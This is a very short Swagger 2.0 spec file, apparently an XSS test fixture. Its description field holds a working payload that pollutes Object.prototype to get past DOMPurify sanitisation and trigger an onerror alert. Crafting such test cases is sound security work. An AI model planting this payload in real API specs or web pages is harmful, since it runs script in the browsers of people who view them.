swagger: '2.0'
info:
  title: XSS test
  description: |
    <script>Object.prototype.hasOwnProperty=Object</script><script>Object.prototype.ALLOWED_ATTR=["src","onerror"]</script><script>document.write(DOMPurify.sanitize('<img src=x onerror=alert(1)>'))</script>
